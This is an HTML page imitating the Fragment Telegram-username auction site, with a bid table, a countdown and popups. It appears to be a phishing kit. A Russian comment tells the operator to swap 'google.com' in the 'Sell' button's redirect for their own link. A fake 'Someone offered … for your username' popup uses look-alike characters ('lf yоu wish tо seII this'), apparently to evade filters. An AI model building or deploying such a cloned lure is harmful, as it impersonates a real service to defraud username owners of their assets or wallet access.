<!DOCTYPE html>
<html class="">

<head>
    <meta charset="utf-8">
    <title>... –&nbsp;Fragment</title>
    <meta name="viewport"
        content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no, viewport-fit=cover">
    <meta name="format-detection" content="telephone=no">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="MobileOptimized" content="176">
    <meta name="HandheldFriendly" content="True">
    <meta name="twitter:card" content="summary">
    <meta property="og:url" content="https://fragment.com/">
    <meta property="og:title" content="Buy and Sell Usernames">
    <meta property="og:image" content="https://fragment.com/img/fragment_image.png">
    <meta property="og:description"
        content="Secure your name with blockchain in an ecosystem of 950+ million users and assign it as a link for your personal account, channel or group.">
    <meta property="og:site_name" content="Fragment Auctions">
    <link rel="canonical" href="https://fragment.com/">
    <meta property="og:type" content="photo">

    <link rel="shortcut icon" href="https://fragment.com/img/fragment.ico" type="image/x-icon">
    <link rel="mask-icon" href="https://fragment.com/img/fragment_icon.svg" color="#121519">
    <script>document.cookie = "stel_dt=" + encodeURIComponent((new Date).getTimezoneOffset()) + ";path=/;max-age=31536000;samesite=None;secure"</script>

    <link href="css/font-roboto.css" rel="stylesheet" type="text/css">
    <link href="css/bootstrap.css" rel="stylesheet">
    <link href="css/bootstrap-extra.css" rel="stylesheet">
    <link href="css/auction.css" rel="stylesheet">

    <style id="_goober">
        .go1088777916 {
            position: relative;
            min-height: 100px;
            width: 416px;
            padding: 44px 56px 24px;
            box-shadow: 0 2px 8px 0 rgba(0, 0, 0, 0.04);
            background-color: #1a2026;
            border-radius: 16px;
        }

        @media (max-width: 440px) {
            .go1088777916 {
                width: 100%;
            }
        }

        .go947285125 {
            font-style: normal;
            font-weight: 510;
            font-size: 14px;
            line-height: 130%;
            color: #fff;
        }

        .go1351255356 {
            position: relative;
        }

        .go1351255356::after {
            content: '';
            display: block;
            position: absolute;
            top: 0;
            bottom: 0;
            left: 0;
            right: 0;
            border: 0.5px solid rgba(0, 0, 0, 0.08);
            border-radius: inherit;
        }

        .go2206683282 {
            display: flex;
            align-items: center;
            position: relative;
            background-color: #fff;
            border-radius: 12px;
            padding: 24px 0;
            height: 304px;
            width: 100%;
            overflow: hidden;
            cursor: pointer;
            border: none;
        }

        @media not all and (hover: none) {
            .go2206683282:hover .go3210036715 {
                transform: scale(1.04);
            }
        }

        .go2206683282:active .go3210036715 {
            transform: scale(0.96);
        }

        @media (hover: none) {
            .go2206683282:active .go3210036715 {
                transform: scale(0.92);
            }
        }

        .go2819881111 {
            background-color: #18181A;
        }

        .go1066629380 {
            font-style: normal;
            font-weight: 510;
            font-size: 16px;
            line-height: 22px;
            text-align: center;
            color: #8794a1;
            margin-top: 0;
            margin-bottom: 32px;
            cursor: default;
        }

        .go1917905559 {
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            width: 32px;
            height: 32px;
            border-radius: 50%;
            background-color: #242e38;
            border: none;
            cursor: pointer;
            transition: transform 0.125s ease-in-out;
        }

        @media not all and (hover: none) {
            .go1917905559:hover {
                transform: scale(1.04);
            }
        }

        .go1917905559:active {
            transform: scale(0.96);
        }

        @media (hover: none) {
            .go1917905559:active {
                transform: scale(0.92);
            }
        }

        .go37342527 {
            box-shadow: 0 4px 16px rgba(0, 0, 0, 0.08), 0 16px 64px rgba(0, 0, 0, 0.16);
            width: fit-content;
            margin: auto;
        }

        @media (max-width: 440px) {
            .go37342527 {
                width: 100%;
                height: fit-content;
                margin: auto 0 0 0;
            }
        }

        .go3288899091 {
            transform: translateY(-8px);
            margin-bottom: 12px;
        }

        .go3535743411 {
            margin-bottom: 12px;
        }

        tc-root * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: -apple-system, BlinkMacSystemFont, 'Roboto', 'Helvetica Neue', Arial, Tahoma, Verdana, sans-serif;
            -webkit-font-smoothing: antialiased;
            -moz-osx-font-smoothing: grayscale;
            -webkit-tap-highlight-color: transparent;
        }

        tc-root img {
            -webkit-user-select: none;
            -webkit-touch-callout: none;
        }

        tc-root *:focus {
            outline: #08f auto 2px;
        }

        tc-root li {
            list-style: none;
        }

        tc-root button {
            outline: none;
        }

        body.tc-disable-scroll {
            position: fixed;
            overflow-y: scroll;
            right: 0;
            left: 0;
        }

        body.tc-using-mouse tc-root *:focus {
            outline: none;
        }

        .go3758850101 {
            position: absolute;
            right: 16px;
            top: 16px;
        }

        .go4165388501 {
            font-style: normal;
            font-weight: 700;
            font-size: 20px;
            line-height: 28px;
            text-align: center;
            color: #fff;
            margin-top: 0;
            margin-bottom: 0;
            cursor: default;
        }

        .go3759480660 {
            max-width: 320px;
            margin-top: 2px;
            margin-bottom: 20px;
        }

        .go31708566 {
            width: 48px;
            height: 48px;
            border-radius: 8px;
            background-color: #fff;
        }

        .go2721578401 {
            position: absolute;
            width: 60px;
            height: 60px;
            background: #fff;
            display: flex;
            align-items: center;
            justify-content: center;
        }

        .go2892675405 {
            position: relative;
            width: fit-content;
            margin: 0 auto;
        }

        .go2892675405>div:first-child {
            display: flex;
            align-items: center;
            justify-content: center;
        }

        .go2892675405 rect {
            fill: transparent;
        }

        .go2892675405 path {
            fill: #000000;
        }

        .go3210036715 {
            width: 52px;
            height: 52px;
            background: transparent;
            position: absolute;
            right: 0;
            bottom: 0;
            display: flex;
            align-items: center;
            justify-content: center;
            transition: transform 0.125s ease-in-out;
        }

        .go1369062826 {
            margin-bottom: 24px;
        }

        .go3951985015 {
            margin-bottom: 16px;
        }

        .go1555597565 {
            width: 100%;
            height: 100%;
            border-radius: inherit;
        }

        .go433715570 {
            width: 60px;
            height: 60px;
            border-radius: 12px;
            margin-bottom: 8px;
        }

        .go484915856 {
            position: absolute;
            right: 10px;
            top: 50px;
            width: 24px;
            height: 24px;
            border-radius: 6px;
            box-shadow: 0 2px 8px 0 rgba(0, 0, 0, 0.08);
        }

        .go100971292 {
            max-width: 90px;
            font-weight: 590;
            white-space: nowrap;
            text-overflow: ellipsis;
            overflow: hidden;
        }

        @media (max-width: 440px) {
            .go100971292 {
                max-width: 80px;
            }
        }

        .go3335336515 {
            font-weight: 510;
            max-width: 90px;
            white-space: nowrap;
            text-overflow: ellipsis;
            overflow: hidden;
            color: #fff;
        }

        @media (max-width: 440px) {
            .go3335336515 {
                max-width: 80px;
            }
        }

        .go4005132735 {
            position: relative;
            cursor: pointer;
            border: none;
            background-color: unset;
            padding: 8px 4px;
            width: 92px;
            display: flex;
            flex-direction: column;
            align-items: center;
            transition: transform 0.125s ease-in-out;
        }

        @media not all and (hover: none) {
            .go4005132735:hover {
                transform: scale(1.04);
            }
        }

        .go4005132735:active {
            transform: scale(0.96);
        }

        @media (max-width: 440px) {
            .go4005132735 {
                padding: 8px 4px;
                width: 82px;
            }
        }

        @media (hover: none) {
            .go4005132735:active {
                transform: scale(0.92);
            }
        }

        .go1193446911 {
            font-weight: 510;
            max-width: 90px;
            white-space: nowrap;
            text-overflow: ellipsis;
            overflow: hidden;
            color: #8794a1;
        }

        @media (max-width: 440px) {
            .go1193446911 {
                max-width: 80px;
            }
        }

        .go2361975760 {
            width: 20px;
            height: 20px;
            border-radius: 6px;
        }

        .go2856384431 {
            width: 60px;
            height: 60px;
            padding: 8px;
            margin-bottom: 8px;
            border-radius: 12px;
            background-color: #242e38;
            display: grid;
            grid-template: 1fr 1fr / 1fr 1fr;
            gap: 4px;
        }

        .go593626609 {
            display: flex;
        }

        .go3516602140 {
            display: flex;
            flex-direction: column;
            align-items: center;
            padding-bottom: 16px;
        }

        .go1392445990 {
            padding-left: 24px;
            padding-right: 24px;
            padding-top: 18px;
            padding-bottom: 0;
        }

        @media (max-width: 440px) {
            .go1392445990 {
                padding-left: 0;
                padding-right: 0;
                min-height: 364px;
            }
        }

        .go3569146033 {
            background-color: rgba(144, 144, 153, 0.12);
        }

        .go2969827049 {
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 16px 16px 16px 18px;
            border-radius: 0 0 16px 16px;
        }

        .go1624287002 {
            border-radius: 16px;
            background-color: #242e38;
        }

        @media (max-width: 440px) {
            .go1624287002 {
                border-radius: 16px 16px 0 0;
            }
        }

        .go823957079 {
            display: flex;
            position: fixed;
            z-index: 1000;
            left: 0;
            top: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.4);
            padding: 20px 0;
            overflow-y: auto;
        }

        @media (max-width: 440px) {
            .go823957079 {
                padding-bottom: 0;
            }
        }

        .go2048186338 {
            width: 46px;
            height: 46px;
            border-radius: 8px;
            background-color: #fff;
        }
    </style>
</head>

<body class="emoji_image tc-using-mouse" ontouchstart="" style="top: auto;">
    <svg xmlns="http://www.w3.org/2000/svg" style="position:absolute;width:0;height:0;left:-10000px">
        <defs>
            <path id="icon-premium"
                d="m8.88 13.45 2.89-5.71c.33-.66 1.14-.93 1.8-.6.25.13.46.35.59.61l2.73 5.51c.22.45.66.76 1.16.82l5.7.68c.78.09 1.33.79 1.24 1.57-.04.31-.18.61-.41.84l-4.52 4.42c-.18.18-.27.43-.23.68l.75 5.98c.1.85-.5 1.63-1.36 1.74-.32.04-.65-.02-.94-.18l-4.77-2.59c-.34-.19-.76-.19-1.11-.01l-4.93 2.52c-.7.35-1.55.07-1.91-.62-.13-.26-.18-.55-.14-.84l.4-2.74c.19-1.34 1.03-2.51 2.23-3.12l5.49-2.78c.15-.08.2-.26.13-.4-.06-.12-.18-.18-.31-.16l-6.71.95c-1.02.15-2.06-.14-2.87-.79l-2.23-1.82c-.64-.51-.73-1.45-.22-2.09.24-.29.59-.48.97-.53l5.73-.74c.36-.04.68-.27.85-.6z">
            </path>
            <path id="icon-ton-qr"
                d="m4.02 7h15.945c.33 0 .6.27.6.615 0 .105-.015.21-.075.3l-7.56 13.62c-.33.6-1.08.81-1.665.48-.21-.12-.375-.285-.48-.495l-7.305-13.62c-.15-.3-.045-.675.255-.825.09-.045.18-.075.285-.075zm7.98 14.67v-14.67z"
                fill="none" stroke="currentColor" stroke-width="2.1"></path>

            <path
                d="M 6.67 5.74 L 8.88 1.32 C 9.13 0.81 9.74 0.6 10.25 0.86 C 10.45 0.96 10.61 1.13 10.71 1.33 L 12.79 5.59 C 12.96 5.93 13.29 6.17 13.67 6.22 L 18.03 6.74 C 18.62 6.82 19.05 7.36 18.98 7.96 C 18.95 8.2 18.84 8.43 18.66 8.61 L 15.21 12.03 C 15.07 12.16 15.01 12.36 15.03 12.56 L 15.6 17.17 C 15.69 17.83 15.22 18.44 14.57 18.52 C 14.32 18.55 14.07 18.5 13.85 18.38 L 10.21 16.38 C 9.95 16.24 9.63 16.23 9.36 16.37 L 5.59 18.32 C 5.06 18.59 4.41 18.38 4.14 17.84 C 4.03 17.64 4 17.41 4.03 17.19 L 4.33 15.07 C 4.48 14.03 5.12 13.14 6.04 12.66 L 10.23 10.51 C 10.34 10.45 10.38 10.31 10.33 10.2 C 10.28 10.11 10.19 10.06 10.09 10.08 L 4.97 10.82 C 4.19 10.93 3.39 10.71 2.78 10.2 L 1.07 8.8 C 0.58 8.4 0.51 7.68 0.9 7.18 C 1.09 6.96 1.35 6.81 1.64 6.77 L 6.02 6.2 C 6.3 6.17 6.54 5.99 6.67 5.74 Z"
                id="icon-star"></path>
            <linearGradient x1="25%" y1="0.825%" x2="74.92%" y2="107.86%" id="s2">
                <stop stop-color="#FFD951" offset="0%"></stop>
                <stop stop-color="#FFB222" offset="100%"></stop>
            </linearGradient>
            <linearGradient x1="50%" y1="0%" x2="50%" y2="99.8%" id="s3">
                <stop stop-color="#E58F0D" offset="0%"></stop>
                <stop stop-color="#EB7915" offset="100%"></stop>
            </linearGradient>
            <filter x="-5.2%" y="-5.3%" width="110.3%" height="110.6%" filterUnits="objectBoundingBox" id="s4">
                <feOffset dx="1" dy="1" in="SourceAlpha" result="shadowOffsetInner1"></feOffset>
                <feComposite in="shadowOffsetInner1" in2="SourceAlpha" operator="arithmetic" k2="-1" k3="1"
                    result="shadowInnerInner1"></feComposite>
                <feColorMatrix values="0 0 0 0 1 0 0 0 0 1 0 0 0 0 1 0 0 0 0.657 0" type="matrix"
                    in="shadowInnerInner1"></feColorMatrix>
            </filter>
            <g id="icon-colorful-star" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
                <use fill="url(#s2)" fill-rule="evenodd" xlink:href="#icon-star"></use>
                <use fill="#000" filter="url(#s4)" xlink:href="#icon-star"></use>
                <use stroke="url(#s3)" stroke-width="0.89" xlink:href="#icon-star"></use>
            </g>
            <g id="icon-multi-star" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
                <use stroke="currentColor" stroke-width="2.67" xlink:href="#icon-star"></use>
                <use fill="url(#s2)" fill-rule="evenodd" xlink:href="#icon-star"></use>
                <use fill="#000" filter="url(#s4)" xlink:href="#icon-star"></use>
                <use stroke="url(#s3)" stroke-width="0.89" xlink:href="#icon-star"></use>
                <path d="M 5.2 19 L 14 19 L 9.8 16.7 L 5.2 19 Z" fill="currentColor"></path>
            </g>
        </defs>
    </svg>
    <div id="aj_progress" class="progress-bar"
        style="width: 100%; transition: width 0.3s linear, box-shadow 0.2s; position: fixed; z-index: 1000; top: 0px; height: 3px; box-shadow: inset 0 0 0 var(--accent-color, #39ade7);">
    </div>

    <div id="aj_content">
        <header class="tm-header">
            <div class="tm-header-logo">
                <a href="https://fragment.com/" class="tm-logo js-header-logo js-logo js-random-logo js-logo-hoverable">
                    <i class="tm-logo-icon js-logo-icon"></i>
                    <i class="tm-logo-text"></i>
                </a>
            </div>
            <div class="tm-header-body">
                <form action="https://fragment.com" class="tm-header-search-form">
                    <div class="icon-before icon-search tm-field tm-search-field">
                        <input type="search" class="form-control tm-input tm-search-input" name="query"
                            placeholder="Search usernames" autocomplete="off">
                    </div>
                </form>
            </div>
            <div class="tm-header-actions tm-header-actions-wide">
                <div class="btn-group tm-header-action tm-dropdown">
                    <ul class="dropdown-menu">
                        <li><a href="https://fragment.com/convert"
                                class="dropdown-menu-item icon-before icon-menu-convert">My Usernames</a>
                        </li>
                        <li><a href="javascript:;"
                                class="dropdown-menu-item icon-before icon-menu-disconnect logout-link">Log Out</a></li>
                    </ul>
                </div>
                <button class="btn btn-primary tm-header-action tm-header-button ton-auth-link">
                    <i class="icon icon-connect-ton"></i>
                    <span class="tm-button-label">Connect TON</span>
                </button>

            </div>

            <div class="tm-header-menu-button js-header-menu-button icon-before icon-header-menu"></div>
            <div class="tm-header-menu hide js-header-menu" data-close-outside="js-header-menu-window">
                <div class="tm-header-menu-close-button js-header-menu-close-button icon-before icon-header-menu-close">
                </div>
                <div class="tm-header-menu-window js-header-menu-window">

                    <div class="tm-header-menu-body">

                        <h4 class="tm-menu-subheader">Platform</h4>
                        <div class="tm-menu-links">
                            <a href="https://fragment.com/about"
                                class="tm-menu-link icon-before icon-menu-about">About</a>
                            <a href="https://fragment.com/terms"
                                class="tm-menu-link icon-before icon-menu-terms">Terms</a>
                            <a href="https://fragment.com/privacy"
                                class="tm-menu-link icon-before icon-menu-privacy">Privacy Policy</a>
                        </div>
                        <div class="tm-header-menu-footer">
                            <div class="tm-header-menu-footer-text">
                                Connect TON<br>to view your bids and assets
                            </div>
                            <button class="btn btn-primary btn-block tm-menu-button ton-auth-link">
                                <i class="icon icon-connect-ton"></i>
                                <span class="tm-button-label">Connect TON</span>
                            </button>
                        </div>
                    </div>
                </div>
            </div>
        </header>
        <main class="tm-main js-main-content">
            <section class="tm-section tm-auction-section">

                <div class="tm-section-header">
                    <h2 class="tm-section-header-text">
                        <span class="tm-section-header-domain"><span class="tm-web3-address"><span
                                    class="subdomain">...</span><span class="domain">.t.me</span></span></span>

                        <span class="tm-section-header-status tm-status-avail">On auction</span>

                    </h2>
                    <div class="tm-section-subscribe tm-section-box js-subscribe">
                        <a class="btn-link subscribe-btn js-subscribe-btn">Subscribe to updates</a>
                        <a class="btn-link unsubscribe-btn js-unsubscribe-btn">Unsubscribe from updates</a>
                    </div>
                </div>

                <div class="tm-section-box tm-section-bid-info">
                    <table class="table tm-table tm-table-fixed">
                        <thead>
                            <tr>
                                <th style="--width:37%">Highest Bid</th>
                                <th style="--width:28%">Bid Step</th>
                                <th style="--width:35%">Minimum Bid</th>
                            </tr>
                        </thead>
                        <tbody>
                            <tr>
                                <td>
                                    <div class="table-cell">
                                        <div class="table-cell-value tm-value icon-before icon-ton">5,050</div>
                                        <div class="table-cell-desc">&nbsp;~&nbsp;$24,842</div>
                                    </div>
                                </td>
                                <td>
                                    <div class="table-cell">
                                        <div class="table-cell-value tm-value icon-before icon-ton">253</div>
                                        <div class="table-cell-desc">&nbsp;5%</div>
                                    </div>
                                </td>
                                <td>
                                    <div class="table-cell">
                                        <div class="table-cell-value tm-value icon-before icon-ton">5,303</div>
                                        <div class="table-cell-desc">&nbsp;~&nbsp;$26,086</div>
                                    </div>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                    <div class="tm-bid-info-text"><a href="https://fragment.com/about" class="js-howitworks">How does
                            this work?</a></div>
                </div>
                <div class="tm-list tm-section-box tm-section-auction-info">
                    <dl class="tm-list-item">
                        <dt class="tm-list-item-title">Telegram Username</dt>
                        <dd class="tm-list-item-value">
                            <span class="accent-color">@...</span>
                        </dd>
                    </dl>
                    <dl class="tm-list-item">
                        <dt class="tm-list-item-title">Web Address</dt>
                        <dd class="tm-list-item-value">
                            <span class="accent-color">t.me/...</span>
                        </dd>
                    </dl>
                    <dl class="tm-list-item">
                        <dt class="tm-list-item-title">TON Web 3.0 Address</dt>
                        <dd class="tm-list-item-value">
                            <span class="accent-color"><span class="tm-web3-address"><span
                                        class="subdomain">...</span><span class="domain">.t.me</span></span></span>
                        </dd>
                    </dl>
                </div>
                <div class="tm-section-box tm-section-countdown-wrap js-timer-wrap">
                    <div class="tm-section-countdown">
                        <span class="tm-countdown-label">Ends in</span>
                        <time class="tm-countdown-timer" datetime="2024-11-04T00:22:30+00:00"
                            data-relative="counter"><span class="reel"><b class="digit timer-d"
                                    data-val="5 days"></b></span><span class="reel"><b class="digit timer-h0"
                                    data-val="0"></b><b class="digit timer-h1" data-val="4"
                                    data-prev-val="5"></b></span><span class="reel"><b class="digit timer-m0"
                                    data-val="0" data-prev-val="1"></b><b class="digit timer-m1" data-val="5"
                                    data-prev-val="6"></b></span><span class="reel"><b class="digit timer-s0"
                                    data-val="4" data-prev-val="5"></b><b class="digit timer-s1" data-val="7"
                                    data-prev-val="8"></b></span></time>
                    </div>
                    <div class="tm-section-countdown-end">
                        <span class="tm-countdown-label">Auction will close soon</span>
                    </div>
                </div>
                <div class="tm-section-box tm-section-buttons">
                    <!-- в следующей строке вместо google.com вставь ссылку -->
                    <button class="btn btn-primary js-place-bid-btn"
                        onclick="window.location.href = 'google.com'">Sell</button>
                </div>
                <div class="tm-section-subscribe tm-section-box js-subscribe">
                    <a class="btn-link subscribe-btn js-subscribe-btn">Subscribe to updates</a>
                    <a class="btn-link unsubscribe-btn js-unsubscribe-btn">Unsubscribe from updates</a>
                </div>
            </section>
            <section class="tm-section clearfix">
                <div class="tm-section-header">
                    <h3 class="tm-section-header-text">Bid History</h3>
                </div>
                <div class="tm-table-wrap">
                    <table class="table tm-table tm-table-fixed">
                        <thead>
                            <tr>
                                <th style="--thin-width:100px;--wide-width:25%">Price</th>
                                <th style="--thin-width:110px;--wide-width:25%">Date</th>
                                <th style="--width:50%">From</th>
                            </tr>
                        </thead>
                        <tfoot>

                        </tfoot>
                        <tbody>
                            <tr>
                                <td>
                                    <div class="table-cell">
                                        <div class="table-cell-value tm-value icon-before icon-ton">5,050</div>
                                    </div>
                                </td>
                                <td>
                                    <div class="table-cell">
                                        <div class="tm-datetime"><span class="thin-only"><time class="short">Oct 26 at
                                                    03:22</time></span><span class="wide-only"><time>26 Oct 2024 at
                                                    03:22</time></span></div>
                                    </div>
                                </td>
                                <td>
                                    <div class="table-cell">
                                        <a href="https://tonviewer.com/EQCt53NHqFeJghim5e4y7oI2vgDA5Ey5OVoSs1jjk5o7sugH"
                                            class="tm-wallet" target="_blank"><span
                                                class="head">EQCt53NHqFeJghim5e4y7oI2</span><span
                                                class="middle"></span><span
                                                class="tail">vgDA5Ey5OVoSs1jjk5o7sugH</span></a>
                                    </div>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
            </section>
        </main>
        <div class="popup-container hide js-howitworks-popup" data-close-outside="popup-body">
            <div class="popup">
                <div class="popup-body">
                    <section>
                        <h4>How does this work?</h4>
                        <p class="popup-text">You can buy this <a
                                href="https://fragment.com/about#what-is-a-collectible">collectible username</a> and use
                            it for your <b>personal profile</b>, group or channel.<br> <br><b>To do so, simply:</b><br>•
                            Get <a href="https://tonkeeper.com/">Tonkeeper</a>, open it and create a <b>wallet</b>.<br>•
                            Deposit funds in your <b>wallet</b> from a <a href="https://ton.org/buy-toncoin">supported
                                exchange</a> or with <a href="https://wallet.t.me/">@wallet</a> on Telegram.<br>• Use
                            <b>Tonkeeper</b> to log in on Fragment and return to this page.<br>• Tap the buttons below
                            to join the auction.<br><br>Purchased entities become available under My Assets and can be
                            used within any supported platform, starting with Telegram.<br><br><a
                                href="https://fragment.com/about">Learn More</a>
                        </p>
                        <div class="popup-buttons">
                            <a class="btn btn-link btn-lg popup-cancel-btn">Close</a>
                        </div>
                    </section>
                </div>
            </div>
        </div>
        <div class="popup-container js-bet-popup" data-close-outside="popup-body">
            <div class="popup">
                <div class="popup-body">
                    <section>
                        <h4>Someone offered <span class="accent-color"></span> for your username</h4>
                        <p class="popup-text">
                            lf yоu wish tо seII this, plеаsе prеss thе buttоn bеIοw аnd сhеck if thе оffеr suits yоu.
                        </p>
                    </section>
                </div>
            </div>
        </div>
        <div class="popup-container hide form-popup-container js-put-to-auction-popup" data-close-outside="popup-body">
            <div class="popup">
                <div class="popup-body">
                    <section>
                        <h4>Put up for auction</h4>
                        <p class="popup-text">Do you want to make <span class="accent-color js-username"></span>
                            available for auction on <b>Fragment</b>?</p>
                        <form class="js-put-to-auction-form">
                            <input type="hidden" name="username">
                            <div class="form-group">
                                <label for="min_bid_value">Minimum bid</label>
                                <div class="icon-before icon-ton form-control-wrap tm-coin-field">
                                    <input inputmode="decimal" class="form-control js-amount-input" id="min_bid_value"
                                        name="min_bid_value" value="5303" data-usd-for="js-bid_usd_value"
                                        autocomplete="off">
                                    <div class="form-control-hint">~&nbsp;$<span class="js-bid_usd_value">26,086</span>
                                    </div>
                                </div>
                            </div>
                            <div class="form-group">
                                <label for="max_price_value">Maximum price</label>
                                <div class="icon-before icon-ton form-control-wrap tm-coin-field">
                                    <input inputmode="decimal" class="form-control js-amount-input" id="max_price_value"
                                        name="max_price_value" value="" placeholder="Optional" autocomplete="off">
                                </div>
                                <p class="help-block">Set a maximum price if you want to enable anyone to instantly buy
                                    <span class="js-username"></span> for this price.
                                </p>
                            </div>
                            <div class="popup-buttons">
                                <a class="btn btn-link btn-lg popup-cancel-btn">Cancel</a>
                                <button type="submit" class="btn btn-link btn-lg">Proceed</button>
                            </div>
                        </form>
                    </section>
                </div>
            </div>
        </div>
        <div class="popup-container hide form-popup-container place-bid-popup-container js-sell-username-popup"
            data-close-outside="popup-body">
            <div class="popup">
                <div class="popup-body">
                    <section>
                        <h2 class="js-username"></h2>
                        <p class="popup-text">Sell username on <b>Fragment</b></p>
                        <form class="js-sell-username-form">
                            <input type="hidden" name="username">
                            <div class="form-group">
                                <label for="sell_value">Sell price</label>
                                <div class="icon-before icon-ton form-control-wrap tm-coin-field">
                                    <input inputmode="decimal" class="form-control js-amount-input" id="sell_value"
                                        name="sell_value" value="5303" data-for="js-bid_value" autocomplete="off">
                                </div>
                                <div class="tm-form-control-hint"></div>
                            </div>
                            <div class="form-main-button">
                                <button type="submit" class="btn btn-primary btn-block">
                                    <span class="tm-button-label">Sell for <span
                                            class="icon-before icon-ton tm-amount js-bid_value">5,303</span></span>
                                </button>
                            </div>
                        </form>
                    </section>
                </div>
            </div>
        </div>
        <div class="popup-container hide js-convert-confirm-popup" data-close-outside="popup-body">
            <div class="popup">
                <div class="popup-body">
                    <section>
                        <h4>Auction Your Username</h4>
                        <p class="popup-text">The <span class="accent-color">@fragment</span> bot sent you a
                            <b>confirmation message</b> on Telegram, please open it and follow the instructions to
                            proceed.
                        </p>
                        <div class="popup-buttons">
                            <a href="https://t.me/fragment" target="_blank" class="btn btn-link btn-lg">Open bot</a>
                        </div>
                    </section>
                </div>
            </div>
        </div>
        <div class="popup-container form-popup-container hide js-convert-bid-popup" data-close-outside="popup-body">
            <div class="popup">
                <div class="popup-body">
                    <section>
                        <h4>Auction Your Username</h4>
                        <p class="popup-text">You can put <span class="accent-color js-username"></span> up for auction
                            as a <b>collectible username</b>. This action is <b>irreversible</b>.<br><br>The winner of
                            the auction will <b>own</b> the TON collectible – and you are free to bid on it as well.
                            Your wallet will receive the final amount in TON, minus <a target="_blank" rel="noopener"
                                href="http://fragment.com/about#q-are-there-any-transaction-fees">conversion fees</a>.
                        </p>
                        <form class="js-convert-bid-form">
                            <input type="hidden" name="id">
                            <div class="form-group">
                                <label for="bid_value">Your first bid</label>
                                <div class="icon-before icon-ton form-control-wrap tm-coin-field">
                                    <input inputmode="decimal" class="form-control js-amount-input" id="bid_value"
                                        name="bid_value" value="10" data-for="js-bid_value"
                                        data-usd-for="js-bid_usd_value" autocomplete="off">
                                    <div class="form-control-hint">~&nbsp;$<span class="js-bid_usd_value">26,086</span>
                                    </div>
                                </div>
                                <p class="help-block">The auction will start after you place the first bid. If someone
                                    outbids you, you will get this entire amount back. If there are no other bidders,
                                    you will get both the new collectible and your bid amount back, minus 5% and minus a
                                    <span class="icon-before icon-ton-text">5</span> fee.
                                </p>
                            </div>
                            <div class="popup-buttons">
                                <a class="btn btn-link btn-lg popup-cancel-btn">Cancel</a>
                                <button type="submit" class="btn btn-link btn-lg js-do-transfer-btn">Continue</button>
                            </div>
                        </form>
                    </section>
                </div>
            </div>
        </div>
        <div class="popup-container form-popup-container hide js-new-convert-bid-popup" data-close-outside="popup-body">
            <div class="popup">
                <div class="popup-body">
                    <section>
                        <h4>Auction Your Username</h4>
                        <p class="popup-text">This will put <span class="accent-color js-username"></span> up for
                            auction as a <b>collectible username</b>. You can cancel the auction at any time before the
                            first bid is placed.<br><br>You can place your own bids in the auction – the winner will
                            <b>own the TON collectible</b>.<br><br>Your wallet <span class="js-address"></span> will
                            receive the final amount in TON, minus a 5% platform fee and a <a target="_blank"
                                rel="noopener"
                                href="https://fragment.com/about#q-are-there-any-transaction-fees">one-time</a> <span
                                class="icon-before icon-ton">5</span> conversion fee.
                        </p>
                        <form class="js-new-convert-bid-form">
                            <input type="hidden" name="id">
                            <div class="form-group">
                                <label for="bid_value">Minimum bid</label>
                                <div class="icon-before icon-ton form-control-wrap tm-coin-field">
                                    <input inputmode="decimal" class="form-control js-amount-input" id="bid_value"
                                        name="bid_value" value="10" data-for="js-bid_value"
                                        data-usd-for="js-bid_usd_value" autocomplete="off">
                                    <div class="form-control-hint">~&nbsp;$<span class="js-bid_usd_value">26,086</span>
                                    </div>
                                </div>
                                <p class="help-block">The auction will start after someone places the first bid.</p>
                            </div>
                            <div class="popup-buttons">
                                <a class="btn btn-link btn-lg popup-cancel-btn">Cancel</a>
                                <button type="submit" class="btn btn-link btn-lg js-do-transfer-btn">Create
                                    Auction</button>
                            </div>
                        </form>
                    </section>
                </div>
            </div>
        </div>
        <div class="popup-container hide js-make-offer-popup" data-close-outside="popup-body">
            <div class="popup">
                <div class="popup-body">
                    <section>
                        <h4>Make an offer</h4>
                        <p class="popup-text">Let the owner of <span class="accent-color">@...</span> know that you are
                            willing to buy this username.</p>
                        <form class="js-make-offer-form">
                            <input type="hidden" name="id">
                            <div class="form-group">
                                <label for="amount_value">How much would you pay?</label>
                                <div class="icon-before icon-ton form-control-wrap tm-coin-field">
                                    <input inputmode="decimal" class="form-control js-amount-input" id="amount_value"
                                        name="amount_value" value="" data-for="js-amount_value"
                                        data-usd-for="js-amount_usd_value" placeholder="Enter any amount in TON"
                                        autocomplete="off">
                                    <div class="form-control-hint" style="display: none;">~&nbsp;$<span
                                            class="js-amount_usd_value">0</span></div>
                                </div>
                                <p class="help-block">We will notify you on Telegram if the owner of the username makes
                                    it available for sale.<br><br>This service costs <span
                                        class="icon-before icon-ton-text js-amount_fee"></span> for this username.</p>
                            </div>
                            <div class="popup-buttons">
                                <a class="btn btn-link btn-lg popup-cancel-btn">Cancel</a>
                                <button type="submit" class="btn btn-link btn-lg js-do-offer-btn">Proceed</button>
                            </div>
                        </form>
                    </section>
                </div>
            </div>
        </div>
        <div class="popup-container hide js-howofferworks-popup" data-close-outside="popup-body">
            <div class="popup">
                <div class="popup-body">
                    <section>
                        <h4>How does this work?</h4>
                        <p class="popup-text">You can make an offer for this username, suggesting the owner to sell it
                            on Fragment. To encourage serious offers, this process requires a <b>small
                                fee</b>.<br><br><b>To pay the fee, simply:</b><br>• Get <a
                                href="https://tonkeeper.com/">Tonkeeper</a>, open it and create a <b>wallet</b>.<br>•
                            Deposit funds in your <b>wallet</b> from a <a href="https://ton.org/buy-toncoin">supported
                                exchange</a> or with <a href="https://wallet.t.me/">@wallet</a> on Telegram.<br>• Use
                            <b>Tonkeeper</b> to log in on Fragment and return to this page.<br>• Log in with your
                            <b>Telegram account</b> to receive a notification if the username gets listed.<br>• Tap the
                            button to make an offer – enter the amount you'd be <b>willing to spend</b> for this
                            username.<br>• Scan the QR code to <b>pay the fee</b> for making the offer.<br><br>The owner
                            will receive your offer on Telegram – if they&nbsp;decide to list their username, you'll be
                            able to make your bid.<br><br><a href="https://fragment.com/about">Learn More</a>
                        </p>
                        <div class="popup-buttons">
                            <a class="btn btn-link btn-lg popup-cancel-btn">Close</a>
                        </div>
                    </section>
